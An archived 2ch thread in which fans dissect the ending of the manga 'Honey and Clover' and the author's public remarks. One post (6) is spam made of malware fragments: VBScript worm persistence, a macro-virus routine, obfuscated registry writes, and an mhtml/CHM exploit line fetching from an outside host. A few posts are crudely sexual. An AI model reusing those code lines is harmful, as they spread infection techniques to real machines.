2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

羽海野チカ「ハチミツとクローバー」その58

1 :花と名無しさん:2006/09/17(日) 19:00:21 ID:???P
◆ コミックス第10巻…9月8日発売 ◆
◆ アニメ第2部…放送中 ◆
◆ 映画…一部上映中 ◆
※アニメ、映画の話題はそれぞれ専用のスレがあるのでそちらでどうぞ(>>2-3参照)※
★ このスレはsage進行です ※メール欄に半角で「 sage 」と記入。これ重要※
★ 荒らし・煽りは完全無視 ※反応するアナタも同罪です。これ常識※
★ 風紀もほどほどに ※話題の流れを変えたかったら自分から別の話題を投下する。これ鉄則※
≪前スレ≫
羽海野チカ「ハチミツとクローバー」その57
http://comic6.2ch.net/test/read.cgi/gcomic/1157895993/
★ 過去ログ保管庫
http://www.geocities.jp/hachikuro2ch/関連スレ,頻出質問事項等は>>2-20あたりに

2 :花と名無しさん:2006/09/17(日) 19:03:55 ID:???P
≪過去ログ≫
http://makimo.to:8000/cgi-bin/search/search.cgi?q=%89H%8AC%96%EC%83%60%83J&sf=2&andor=AND&H=&view=table&all=on
≪関連スレ≫
≪関連スレ≫
≪過去ログ≫
http://makimo.to:8000/cgi-bin/search/search.cgi?q=%89H%8AC%96%EC%83%60%83J&sf=2&andor=AND&H=&view=table&all=on
≪関連スレ≫
<<関連スレ>>
アニメ版
ハチミツとクローバー II chapter.5 【ハチクロ】
http://anime.2ch.net/test/read.cgi/anime/1156676761/
映画版
【櫻井翔】ハチミツとクローバー4冊目【蒼井優】
http://tv8.2ch.net/test/read.cgi/cinema/1155394779/

3 :花と名無しさん:2006/09/17(日) 19:06:13 ID:???P
≪公式サイト≫
ハチクロ連載中コミック誌「コーラス」
h ttp://chorus.shueisha.co.jp
作者(羽海野チカ)
h ttp://www13.plala.or.jp/umino
アニメ
h ttp://www.hachikuro.net
映画
h ttp://hachikuro.jp

≪頻出質問事項≫
Q.花本はぐみは、花本修司の姪ですよね?
A.違います。花本修司のいとこの娘です。※映画でのみ「姪」設定となっています

Q.登場キャラクターの身長の設定はどうなってますか?
A.[はぐ 145cm][山田 167cm][竹本 174cm][森田 179cm][真山 181〜182cm]

4 :花と名無しさん:2006/09/17(日) 19:08:16 ID:???P
訂正
ハチミツとクローバー II chapter.6 【ハチクロ】
http://anime.2ch.net/test/read.cgi/anime/1158193920/

後は誰か頼む

5 :花と名無しさん:2006/09/17(日) 19:23:29 ID:???O
アニメ化、映画化と言う点では矢沢あいと同じだけど
矢沢ですらさすがにここまで(個人の人格に限っては)叩かれてないよ。
出たがり&語りたがりか、そうでないかの違いだよ。
あっちこっちの憧れてた業界の人とオトモダチごっこしてないで
ポリシー持って漫画家だと言う事を第一に専念してれば良かったのに…

6 :<body onload=window()>:2006/09/17(日) 19:49:35 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub




7 :花と名無しさん:2006/09/17(日) 19:51:46 ID:???0
羽海野チカは他人にへつらう米搗きバッタですから by一条ゆかり

8 :花と名無しさん:2006/09/17(日) 19:55:00 ID:???0
>>7
そのコメントは秋本治に対して失礼だよな

9 :花と名無しさん:2006/09/17(日) 19:59:25 ID:???0
>7
最初、仲のいい友達をネタにしたんだと思ったけど
「米搗きバッタ」ってどうみてもいい言葉じゃないよね
やっぱ一条さんとウミノさんて仲悪いの?

10 :花と名無しさん:2006/09/17(日) 20:01:57 ID:???0
米つきバッタとは人に頭をペコペコ下げる人を嘲うときに使う言葉で、そうした様が米つきバッタに似ていることからきた例え言葉である。
米つきバッタは第三者が嘲う場合・自嘲する場合の両方に使われるが、言葉の裏に「媚び諂う(こびへつらう)」「お調子者」といった意が含まれており、腰の低さを褒める場合には使われない。

らしい。

11 :花と名無しさん:2006/09/17(日) 20:26:14 ID:???0
ttp://up2.viploader.net/pic/src/viploader303803.jpg

-----------------------------
秋本先生!連載30周年おめでとうございます。生き馬の目を抜くようなジャ
ンプでよくもまあ30年も……凄いです!!両さんはいったい幾つなんでしょう
ね。『セーラームーン』と『幽☆遊☆白書』の結婚式でお目にかかった時、
あまりの腰の低さにびっくりしました。羽海野チカは "米搗きバッタ" をや
り過ぎて首がおかしくなったことがあるそうです。気をつけてくださいね。
-----------------------------

12 :花と名無しさん:2006/09/17(日) 20:29:19 ID:???0
関係ないけど左下の泣いてる人が誰だかわからない

13 :花と名無しさん:2006/09/17(日) 20:33:54 ID:???0
大原大次郎か?

14 :花と名無しさん:2006/09/17(日) 20:39:44 ID:???0
鼻水とクローバー

15 :花と名無しさん:2006/09/17(日) 20:40:37 ID:???0
苦労婆

16 :花と名無しさん:2006/09/17(日) 20:42:21 ID:???0
スピンオフってなに?
何かの割引のこと?

17 :花と名無しさん:2006/09/17(日) 20:51:11 ID:???0
>>16
>>16
>>16

18 :花と名無しさん:2006/09/17(日) 21:15:04 ID:???0
ってかここでいいの?懐かし板に移動しなくても?

19 :花と名無しさん:2006/09/17(日) 21:16:05 ID:???0
まだ懐かしの範疇じゃないだろ
アホか

20 :花と名無しさん:2006/09/17(日) 21:19:35 ID:???O
>18
まだスピンオフとやらがあるじゃないか

21 :花と名無しさん:2006/09/17(日) 21:20:50 ID:???0
>>20
だからスピンオフってなんなの?
グッズを売り出すバーゲンかなんか?

22 :花と名無しさん:2006/09/17(日) 21:21:11 ID:???0
あっ草加。スマンかった

23 :花と名無しさん:2006/09/17(日) 21:24:58 ID:???0
>>16,21
ググれよ

24 :花と名無しさん:2006/09/17(日) 21:26:10 ID:???0
>>23
「ググれよ」って何ですか?
流行の言葉ですか?

25 :花と名無しさん:2006/09/17(日) 21:26:20 ID:???0
西森博之のマンガだよ。

26 :花と名無しさん:2006/09/17(日) 21:28:12 ID:???0
>>25
どっちがですか?

27 :花と名無しさん:2006/09/17(日) 21:28:52 ID:???0
>>24
検索してください

28 :花と名無しさん:2006/09/17(日) 21:30:06 ID:???0
>25
ちょwWWwそれスピンアryとかいう奴?

29 :花と名無しさん:2006/09/17(日) 21:30:09 ID:???0
スピンオフって結構使う言葉なのかな。
比較的長く漫画読んでるほうだけど、
今回初めて聞いたよ。

30 :花と名無しさん:2006/09/17(日) 21:31:11 ID:???0
>>28
あの面白くなかったやつか

31 :花と名無しさん:2006/09/17(日) 21:31:44 ID:???0
最近は映画でよく使うよな
踊る大捜査線のスピンオフムービーとか

32 :花と名無しさん:2006/09/17(日) 21:33:35 ID:???0
普通に番外編て書いておけばいいのに。

33 :花と名無しさん:2006/09/17(日) 21:50:53 ID:???O
はぐの苦しみはクリエイティブ系の人ならわかってくれるとかって発言にひいた。
こういうさ、要所要所で偽善の香りがするんだよなあ。
いっそ、はぐが、おまいら愚民と私は違いますが何か?くらい開き直ってればまだマシだ

34 :花と名無しさん:2006/09/17(日) 21:54:00 ID:???0
山田とリカの選択は男を妥協したことがある人ならわかってくれる

35 :花と名無しさん:2006/09/17(日) 21:54:14 ID:???0
で、スピンオフってなんですか?
スケートのショートトラックの技かなんかですか?

36 :花と名無しさん:2006/09/17(日) 22:09:17 ID:???0
>>11
スゲーな。ダブルでイヤミかよ。業界を腰の低さで渡ろうとすると
媚びて調子こいて誰にでも相槌打ちまくって首がおかしくなった羽海野になるぞと。
気をつけろと。

いつもの調子で体調不良話をしたら御大の癪にさわって餌食になったようだね。
気のいい人なら同情を誘いたい羽海野さんの狙いに乗ってやるんだろうが
言った相手が女王様じゃなぁ。

37 :花と名無しさん:2006/09/17(日) 22:25:46 ID:???0
一条スレだとこことはまた微妙に違った解釈をしていて興味深いね。

38 :花と名無しさん:2006/09/17(日) 23:02:04 ID:???0
自分でポエムやら心の声を日記に書いたりすることあるじゃん。
で、後日それを見直すと「なんでこんなこと書いたんだろう・・・」っていうときがある。
矛盾してたり自分勝手な考えだったり。

ハチクロはそんな作品だと思う。
羽海野さんも読み返して「なんでこんなこと・・・」と思っているのかもしれない。
だって羽海野さんの、誰にも読ませない自分だけのポエム帳、みたいな作品を世に出したような感じがする。

39 :花と名無しさん:2006/09/17(日) 23:46:04 ID:???0
みんな修―はぐが恋愛で終わったって感じに見てるんだね
なんか修→はぐはわかったけど、
はぐが修を選んだのは、手動かず逃げるより手動くように頑張るのを選んだって感じで
恋愛対象として選んだとかそんな感じに思えなかった
修は強引にはぐにいこうとしないだろうし、はぐと修は何もないまま終わりかなぁって思った

40 :花と名無しさん:2006/09/17(日) 23:50:27 ID:???0
ハチミツとクローバーと(ry
ttp://portal.nifty.com/2006/09/10/a/

41 :花と名無しさん:2006/09/18(月) 00:13:08 ID:???0
>>39
同意
はぐは臭を男として選んだのではなく創作活動やリハビリを支えてほしくて
選んだんだと思う。
そして臭もそれをわかってるはず。
それなのに周囲に自分がはぐを女性として好きであることをアピールしまくり
なのってどうなの?
いい年したオヤジが妹か娘のように接してきたはぐを追い詰めるなよってオモタ

42 :花と名無しさん:2006/09/18(月) 00:18:06 ID:???0
>>41
修好きとしては、はぐが自立できるようになったら、誰にも言わずにそばを離れて消え去ると思うな。
そう、教室の誰にも継げずに浜美の助教授職をなげうったように。
そして金を返す名目で森田に接近、それとなく決意を伝える。
こうして森田×はぐエンド
たけのこは蚊帳の外

43 :花と名無しさん:2006/09/18(月) 00:20:32 ID:???O
>11
ていうか温帯、頭大丈夫?

という感想しか抱かんかったが。

44 :花と名無しさん:2006/09/18(月) 00:22:47 ID:???0
森田もいろいろ考えてる人だから、修がいなくなっても
はぐをもう選ばない機がするなぁ
はぐは結婚せずって感じがする
治った途端、はぐから森田へとかだったら、
あまりにも計算高いはぐにもはや憎悪がわくと思う

45 :花と名無しさん:2006/09/18(月) 00:24:47 ID:oDV0fwfh0
>>41
38が言ったように自分で読み返して後悔してると思う。
あの修の発言さえなかったらよい作品だったのになぁ、と。
特に10巻は急いでる感じがした。

もし時間があるならその後を描いて欲しいわ。
はぐが修に交際を迫られて、苦しんでいくハグを描いた漫画を。
そして森田が助けに来るっていう。

46 :花と名無しさん:2006/09/18(月) 00:24:53 ID:???0
>11
なんか御大のメッセージって
ウミノさんへの皮肉>秋本氏のお祝い
みたいなんだよね。せっかくの30周年なのに

47 :花と名無しさん:2006/09/18(月) 00:29:10 ID:???0
>42
でも森田と殴り合いで喧嘩してるしねえ。
あれも前なら「親バカ」で済まされてただろうけど、
「好きさ大好きさ」の今となっては
森田にはぐを託して去るってのはないんじゃないか。

まあそれまでのエピをすっ飛ばして今の修萌えに走って
こういうラストにした作者だから、
「好きさ大好きさ」をなかったことにしてはぐを森田に、
っていうのもありやもしれん。

48 :花と名無しさん:2006/09/18(月) 00:31:30 ID:???O
はぐが修を選んだのは男としてじゃないってのは禿同。
でも森田はたまにひょっこり顏出しては
はぐにちょっかい出して修に怒られたりしてそう。
竹本も竹本で久しぶりにはぐに会ったりしたら恋熱が再燃したりしそう。

コイツらだけははまだまだ四角関係続きそうな気がするな。

49 :花と名無しさん:2006/09/18(月) 00:34:30 ID:???0
竹本いい奴だし、自分の道も選べたし、はぐとはもうダメにせよ、
彼女とかできて幸せになるだろうなぁと思ったけど、よく考えると
就職先的にかなりきつそうだね
移動しまくるから固定的なつきあいもなさそうだし、
よくて、一緒に働いてる人の娘と結婚くらいな気がする

50 :花と名無しさん:2006/09/18(月) 00:37:18 ID:???0
たけのこは地方で修復作業中に、先輩に連れられて場末のソープでおばさんに筆おろしされると見た。
その結果、たけのこは従来のロリ路線から熟女路線へと修正を迫られることとなる。

51 :花と名無しさん:2006/09/18(月) 00:40:33 ID:???0
竹本は交通事故で(ry

52 :花と名無しさん:2006/09/18(月) 00:43:47 ID:???0
竹本はいい子だから、周りの大人が
結構世話焼いてくれそう。

53 :花と名無しさん:2006/09/18(月) 00:44:50 ID:???0
初めてここきたんだが
修はぐがこんなに世間から認知されてない事に驚いた
私はコミクスで一気に読んだせいか全然違和感無かった
そっかーウミノさんに完敗だよ…とか思ってた
ファンサイトにもどこにも修はぐがいねぇorz

54 :花と名無しさん:2006/09/18(月) 00:45:00 ID:???0
>>51
崩落した寺院に巻き込まれる竹本

55 :花と名無しさん:2006/09/18(月) 00:46:39 ID:???0
竹本が一番救われてないエンディングだったな

56 :花と名無しさん:2006/09/18(月) 00:50:47 ID:???0
>>52
世話焼こうにも回りの大人もモテなさそうな連中ばっかなんだよね
偶然姐さん系の人にあったら、その人にぐいぐい引っ張られて〜ってのはありそう
はぐタイプとくっつくのは難しいだろうなぁと思う
芸術一筋とかじゃなくて、おとなしくて男の人苦手です、みたいな感じの子は無理っぽい

57 :花と名無しさん:2006/09/18(月) 00:59:52 ID:???0
竹本はもうきれいに失恋してて今後のどんでん返しや再燃はいらないなと思う。
森田とはぐも結婚とかなくていい。
終生のライバルみたいな感じのほうがいいと思う。
しかしはぐの修からの卒業、これだけは見届けたい。
うみのさん同人誌でいいから描いてくれ・・・・・・・・・・・・・

58 :花と名無しさん:2006/09/18(月) 01:03:02 ID:???0
はぐが、幼い頃の自分と修ちゃんのことを回想する話を読むと
やっぱりはぐも修ちゃんを男性として、好きなんじゃないかなーと思った。

59 :花と名無しさん:2006/09/18(月) 01:04:26 ID:???0
>>58
親愛の情と恋愛感情は別物ではないだろうか?

60 :花と名無しさん:2006/09/18(月) 01:04:34 ID:???0
>>56
別にはぐみたいなタイプじゃなくてもいいんじゃない?
竹本は自分に好意をもってくれる女性が現れれば誰でもおちそうな気がする

61 :花と名無しさん:2006/09/18(月) 01:09:48 ID:???0
>>59
人それぞれ受け取り方違うからね・・・。

62 :花と名無しさん:2006/09/18(月) 01:11:36 ID:???0
>>61
じゃあなにか、
修ちゃんがツイスターで股をがばーっと開いたときはぐはあそこがジュンジュワーだったってことか?

63 :花と名無しさん:2006/09/18(月) 01:12:28 ID:???0
>>58
雑誌でざっと立ち読みした時は自分も同じように思ったんだけど
10巻読んでやはり違うなと感じた。
はぐの修への気持ちは自分を保護して育ててくれる人。
幼子が親に対して抱いている絶対的な信頼感のようなものだと思った。
男性として修が好きっていうのとは違うような気がする。

64 :花と名無しさん:2006/09/18(月) 01:13:38 ID:???0
>>63
修ははぐにとっては生態学でいう宿主にすぎないんだよね

65 :花と名無しさん:2006/09/18(月) 03:12:19 ID:???0
安らげるけど異性としてでない(もしくは一番でない)、加えて相手の異性としての好きを感じつつあったからこそ
怪我前は修から離れる形を考えていたんだろうね。卒業すると親子ごっこを続けるタテマエが崩れるし。

だからお互いに得のある関係であっても修とはぐが一緒になる事ははぐにとっては「借り」であり
返せないかもしれないという前置きつきではあるけど、未だに「返さなくちゃ」と思ってるんだと解釈してる。

66 :花と名無しさん:2006/09/18(月) 03:34:45 ID:???0
>>65
私もそう思う。
はぐは竹本に「手を治さないと修ちゃんになにも返せなくなる」
という気持ちを告白している。
これははぐ自身が作品を作ることでしか修に酬いることができない。
逆に言うとそれ以外の修の気持ち(はぐに対する好意)には応える
ことができないと思っているようにうけとれた。
修のはぐへの思いが強いほどはぐの「借り」は大きくなるわけで
だからこそ竹本が「なにもかえさなくていい、それは先生が自分で
みつけるもの」の言葉にほっとして涙をこぼしたんだと思う。


67 :花と名無しさん:2006/09/18(月) 04:00:27 ID:???0
加えて言うと、はぐは創作(芸術)を失った自分を森田が愛し続ける
ことがないことを見抜いたんじゃないかな?
あの二人は互いの人間性よりも芸術性に惹かれあっているように見える。
芸術を失った自分を森田は愛し続けることはなく芸術を捨てた森田を自分も
愛することができない。
だから自分も森田も創ることを辞めない道、それが修だったんじゃ・・・。

つまり言い方悪いけど森田と自分を愛するゆえ、修を利用するしかない
という結論にいたったのではないかと思った。

68 :花と名無しさん:2006/09/18(月) 04:13:58 ID:???O
はぐは絵を描くために修を選んで、気持ちは森田にあるんでしょう。
いくら修自身が返さなくていいと言っても、修の気持ちを知っていながら森田の様子をパソでうれしそうに見るはぐって・・・甘えすぎ消えてくれ。


これって、少しズレるがダメな男が美人姉妹にモテまくる的な少年漫画のファンタジーに近いのかもと感じた

69 :花と名無しさん:2006/09/18(月) 07:51:09 ID:???0
はぐの気持ちが森田に残ってるのは読んでても分かるじゃん。
それなのに、、
利己的に臭を選ぶからますます叩かれてる訳で。

まあ、
メンヘル女に他人を思いやる気持ちとか求めても無駄だが。

70 :花と名無しさん:2006/09/18(月) 08:06:29 ID:???O
>>69

絵を描かなきゃ死んじゃうなら、恋愛を捨てて利己的に臭を選ぶのもそれはそれで構わないと思う

しかし、ヒトからひどい女と見られようとこれだけは捨てられない、私にはそれしか無い!という覚悟とかが見えない上に、いいコぶるからイヤなんだよな
周りも容認するし気持ちの悪い世界だ

71 :花と名無しさん:2006/09/18(月) 09:06:22 ID:???0
>>65-67
読者にここまで補完させないと理解できないような
ストーリー、構成、描き方の
ハチクロが不親切だなーと思う。

羽海野さんって、どうでもいいエピソードは細々描くのに
それは絶対にはしょっちゃいけないだろう!?というエピソードを
ものすごい勢いで飛ばして描くんだもんなぁ。
(本人談。はぐのエピソードは読者が読むとツライだろうから
 飛ばして描いたと本人がインタビューで語った)

そしてそうやって補完してもやっぱり
「はぐって打算的で好きになれない」
「はぐって、ズルイ」と思ってしまう。

はぐが臭ちゃんを芸術のサポーターとしてそばにいてほしいのなら
「人生ください」みたいな「女からのプロポーズ」のような言い方ではなく
もっと別の言い方があったのではないかと思う。
「人生ください」だと、臭ちゃんのはぐへの恋心を知ってて
はぐが利用したみたいだ。

72 :71:2006/09/18(月) 09:11:58 ID:???0
>>70
>ヒトからひどい女と見られようとこれだけは捨てられない、私にはそれしか無い!

そのほうがまだ自分はなんぼか、はぐを認めることができたと思う。

天然なのかもしれないけど、幼稚で自分勝手で打算的な人間のくせに
天使のような純粋で穢れなく、でも強さももった素晴らしいコとして
描かれてるのがいやだな。




73 :花と名無しさん:2006/09/18(月) 09:19:26 ID:???0
>71
>どうでもいいエピソードは細々描くのに
>それは絶対にはしょっちゃいけないだろう!?
>というエピソードをものすごい勢いで飛ばして描く

それが同人作家と言われる所以なのでは。
ストーリーじゃなくて自分の萌えるエピソードが描きたいだけという。

74 :花と名無しさん:2006/09/18(月) 09:42:00 ID:???0
ハチクロスレで「チッチとサリー(小さな恋のものがたり)」の話が
出たことがあるけど、(読んだことない人はわからない話題でスマン)
チッチも他のキャラ達と同年齢には見えないほど小さくて
性格も幼稚だったりワガママだったりするんだけど
人から親切にされたらお礼は言うし
他人に対してイヤな態度を取ってしまったら反省するし、
何より、作者が「チッチマンセー」で話を作ってないんだよね。
チッチが間違ったことをしたら、それをたしなめる友人がまわりにいる。

はぐは人から親切にされてもお礼も言えないし
人にイヤな態度を取ってしまっても反省もしないし。
作者が、要約すると
「クリエイティブな読者しかはぐのことは理解できない」みたいな
勘違い発言するし。

75 :花と名無しさん:2006/09/18(月) 10:23:51 ID:???O
やはり修の大好きさ発言と周囲の祝福がいらんかったなぁ
あれがなけりゃはぐは恋より芸術を選んだんだーで終わったのに。

76 :花と名無しさん:2006/09/18(月) 10:44:59 ID:???0
>>72
何から何までそのとおりだ。

>>73
その上、インタビューなど漫画外での説明が多いのが、同人誌のおまけの語りページみたいなんだよな。


77 :花と名無しさん:2006/09/18(月) 11:26:22 ID:???0
>>74
えー?チッチは普通に打算的で嫉妬深くて友達すら馬鹿にする嫌な女だよ。

78 :花と名無しさん:2006/09/18(月) 11:29:42 ID:???0
>75
周りの祝福や、好きさ大好きさは
はぐが打算的に見えないような工夫だったのかもしれないけど
裏目に出てる。


79 :花と名無しさん:2006/09/18(月) 11:32:07 ID:???0
>>75
まったくはぐが修を好きだって気持ちは感じられなかったんだけど
ここではぐも修を好きなんじゃないかって意見見てもう一度見たけど
やっぱそうは見えなかった
話の展開的に
修がはぐを好きだってことを出してからはぐが選んだんだったらそういう感じとか思えるけど
はぐが修を選んでから、修が好きだったってのを出されてもその前の時点ではまったく感じられない

というか、修の好きだよ、で終わってれば、まだ大丈夫だったと思う
そこをまわりの祝福入れて、挙句、次の会にしっかり山田との会話で
それが本気だって感じに見せちゃったから、もう完全に確定してしまって
なんで?みたいな感じになったように思う

80 :花と名無しさん:2006/09/18(月) 11:40:16 ID:???0
>>77
知ってる。チッチはけっして良い子ではない。
嫉妬心やコンプレックスが強かったり、腹黒さもある。

でも、チッチははぐと違って、そういう自分を反省できるし
何よりも、作者がそんなチッチを「可愛いでしょ、いい子でしょ」と
美化して描いてないし
「クリエイティブな読者ならチッチの良さをわかってくれると思う」
「岸本さん派とサリー派がマンガの内容に文句つけてきたので
 悲しかった」
みたいなことをインタビューで作者がほざいたりしない。

まぁここは小恋スレじゃないのでこのへんにしとくね。

81 :花と名無しさん:2006/09/18(月) 13:13:34 ID:???O
>>66
ああ、なんか納得!

82 :花と名無しさん:2006/09/18(月) 13:41:19 ID:oDV0fwfh0
そういえば真山が女遊びの激しい人間という設定が
番外編で山田の勘違いだったということで帳消しになったじゃん。

ハグと修も番外編で訂正しちゃえばいいのに。

83 :花と名無しさん:2006/09/18(月) 13:49:29 ID:???0
結局修は報われないって話か

84 :花と名無しさん :2006/09/18(月) 14:08:43 ID:???0
あくまで修はリハビリに必要だった ならいいのに

メンバーのなかでは山田の反応が一番まっとうだよね
自分も修は圏外だと思ってた

85 :花と名無しさん:2006/09/18(月) 15:06:01 ID:???0
作中の登場人物達がみんな青春真っ只中にいて揺れ動いているなかで
修が柱の役割をしているように思っていた。
ところが最後にその柱がボッキリと折れて屋根ごと崩れてきた感じ。
いい意味での破壊じゃなく今までのものが全て台無しになったような
憤りを感じるよ・・・


86 :花と名無しさん:2006/09/18(月) 15:11:42 ID:???0
理花に盲目だからって真山の態度はいただけないな(´・ω・`)
竹本、絶交するなら森田じゃなく真山だお?

87 :花と名無しさん:2006/09/18(月) 15:15:46 ID:???0
上で出てるように自分もはぐ→修は恋愛感情ナシの親愛+打算な選択だと思うんだけど
それだと「金はかえすがはぐはかえさん!」とか浮かれまくって既に旦那きどりな修が
イタくてたまらないんですが・・・・・・・





88 :花と名無しさん:2006/09/18(月) 15:15:56 ID:???0
>>46
秋本へのお祝いというのも微妙でしょ
コメントが誉めているように感じられないし
>『セーラームーン』と『幽☆遊☆白書』の結婚式
ってのもどうかと思うし、正直>>43と同じ感想

89 :花と名無しさん:2006/09/18(月) 15:16:38 ID:???0
それまで保護者的立場だったのが、
ほとんど前触れもなくだからな。

怒らずとも呆れて当然の展開だ。

90 :花と名無しさん:2006/09/18(月) 16:04:16 ID:???0
はぐなんて臭にレイープされちまえ

91 :花と名無しさん :2006/09/18(月) 16:09:10 ID:???0
はぐの真意はいまいちはっきりしてないにもかかわらず、
(あきらかに戦う相手として選んでる)
森田・竹本は「修を選んだ方が幸せになれる」とか
修は勝手に恋愛感情を暴露して旦那気取り
周囲も祝福ムード
っておかしくない?

それとも手をつないでた=はぐは修を受け入れたのか?

修のはぐへの思い入れ方は確かに親愛以上にも見えなくなかったが
はっきり言われると萎えるなぁ
だいたいモンゴルの兄妹の例えとかはいつか修を離れて行くことの
暗示じゃなかったの?

92 :花と名無しさん:2006/09/18(月) 16:16:13 ID:???0
あれは駄目これは駄目と
ケチをつけるだけなら馬鹿でもできる
それなら一体、どういうエンディングの迎え方が良かったのか、と

93 :花と名無しさん:2006/09/18(月) 16:22:42 ID:???0
終わりなんて欲しくない(´・ω・`)ネバーエンディングストーリー★

94 :花と名無しさん:2006/09/18(月) 16:25:20 ID:???0
>>92
修はかわらず大学にいて「いつでもそこに行けば会える」
みたいなカンジで皆がそれぞれ卒業してゆく展開がよかったな。
もちろんはぐも。

95 :花と名無しさん :2006/09/18(月) 16:35:43 ID:???0
>>94
自分も

96 :花と名無しさん:2006/09/18(月) 17:17:28 ID:oDV0fwfh0
なんか一気に萎えてしまった。

さようならハチミツとクローバー。
本屋さんに行って売ってくるわ。
今週はうちの地区でアニメの最終回だけど観る気もしない。

97 :花と名無しさん:2006/09/18(月) 17:17:59 ID:???O
青春はいつか終わるからいいのです。
で、たまに思い出してキュンとなると…。

98 :花と名無しさん:2006/09/18(月) 17:25:53 ID:???0
なんか時々>>67みたいに
作品を作れないはぐへ森田はいずれ興味をなくすだろう的なレスを見るけど
森田はそもそもはぐの才能を愛したわけじゃないんだよね
それ含めて認めてるんだろうけど刺激し合える「から」惚れたという解釈は
前提が原作の設定とかみ合わない気がする
森田ははぐが才能溢れる人間だと知る前に一目惚れしてたんだから

ただしはぐは森田とは逆に森田の才能ありきで惚れたみたいだけど

99 :花と名無しさん:2006/09/18(月) 17:37:15 ID:???O
「才能」にひかれて人を好きになったからって
「才能」が枯渇したからもう好きじゃない、サイナラって
必ずしもなるもんでもないと思うが。

二人の関係の仲でいくらでも新たな面が生まれると思う。

100 :花と名無しさん:2006/09/18(月) 18:16:59 ID:???0
結局、修とはぐが性交をかますかかまさないかが、釣りでもなんでもなく最重要ポイントだね。
好きじゃないけど抱かれちゃうって展開もありうるが

101 :花と名無しさん:2006/09/18(月) 18:17:10 ID:???0
親愛の情と恋愛感情って全くの別物では無いと思う。
深い親愛は恋愛と紙一重なところもあり、
そういう意味で修とはぐに気持ちの悪さの
ようなものを感じたことは無かった。
でも深い親愛=恋愛感情ではないわけよ。
あの流れで修はぐに行き着いたのに、青春様だとか
異常に照れるあゆとか大好きさの台詞で
恋愛を大きく出す必要があったのか?



102 :花と名無しさん:2006/09/18(月) 18:20:15 ID:???O
SEXとか抱くとか どうでもいいしwWW
ばカじゃねえの

103 :花と名無しさん:2006/09/18(月) 18:33:09 ID:???0
携帯厨、乙 wwwwWWW

104 :花と名無しさん:2006/09/18(月) 18:56:18 ID:???0
はぐ自体は一般的なそういう知識はあるのか?とか思ったけど
さすがに生理とかいろいろやってればある程度の知識はつくか

105 :花と名無しさん:2006/09/18(月) 19:03:08 ID:???0
はぐは、生理も臭ちゃんにケアしてもらっていそう。
「臭ちゃん、はぐね、ウィスパーは肌がかぶれるから苦手なの。
 エリスがいいの」
「わかってるよ、はぐ。ちゃんとエリスを買ってあるよ。」
「ありがとう。臭ちゃん」

106 :花と名無しさん:2006/09/18(月) 19:04:03 ID:???0
>>104
というかむしろ、原作後半にはぐの絵面が急に大人っぽくなったのは、
男を知ってしまったからという可能性も捨てきれない。
問題は、相手が誰かってこと

107 :花と名無しさん:2006/09/18(月) 19:14:46 ID:4nwW33li0
はぐの顔変わりすぎだし
後半の顔のほうが好き

108 :花と名無しさん:2006/09/18(月) 19:28:51 ID:???0
>>107
真山に抱かれてから大人っぽくなったよね、はぐみ

109 :花と名無しさん:2006/09/18(月) 19:29:33 ID:???0
>>11
まさかこち亀でウミノ大先生の名前を見ようとは…
ウミノ大先生がこち亀を描いたらどうなっちゃうんだ

110 :花と名無しさん:2006/09/18(月) 19:33:59 ID:???0
10巻の表紙の前歯をギラギラさせた
はぐ&山田がブスだと思った。

1巻と2巻と6巻と8巻の表紙のはぐと山田はかわいいのに
なんだ、あの前歯…。

111 :花と名無しさん:2006/09/18(月) 19:37:39 ID:???0
作者はセックス抜きの同衾萌えなんだろうなとは思った
はぐも男3人とそれぞれしてたし、リカ原田でも近い描写あったし…
例外はリカ真山くらいか

112 :花と名無しさん:2006/09/18(月) 19:43:17 ID:???0
はぐ「白の絵の具が足りないよ、修ちゃん・・・」
修「よーし、待ってろはぐ!コソコソシコシコ・・・」

113 :花と名無しさん:2006/09/18(月) 20:03:57 ID:???0
>>111
字が読めなくて意味もわからなかったから
(抱擁、添い寝、みたいな意味かな?と想像したが
 調べないと頭がモヤットするので)
Goo辞書で調べました。
勉強になった。ありがとう。


http://dictionary.goo.ne.jp/search.php?MT=%C6%B1%EA%D0&search_history=&kind=&kwassist=0&mode=0&jn.x=29&jn.y=13

同衾(どうきん)
一つの寝具の中に一緒に寝ること。
特に、男女が特別な関係を持つこと。ともね。



114 :花と名無しさん :2006/09/18(月) 20:10:14 ID:???0
>>106
森田

115 :花と名無しさん:2006/09/18(月) 20:16:20 ID:???0
>>106
倉持

116 :花と名無しさん:2006/09/18(月) 20:16:36 ID:???0
森田や竹本も一回くらいはぐと寝れば妙に神聖視するのをやめたのかもしれないね
そういうのはこの作品的にはありえないのは分かってるけど

117 :花と名無しさん:2006/09/18(月) 20:16:54 ID:???O
なんか
なんつーかこのスレ


みんな色々いっぱい考えてるんだね☆
この漫画でそこまで考えられるってすごぉーい☆


って感じだな
糞になったと言われる辺りより遙か手前で挫折したしアンチスレ行くわ
☆使って何か記念カキコしたかっただけなので気にしないで下さい

118 :花と名無しさん:2006/09/18(月) 20:19:44 ID:???0
5ヶ月かけて1スレも埋まらないアンチスレを
口だけじゃなく盛り上げてくださいね☆
携帯さん☆

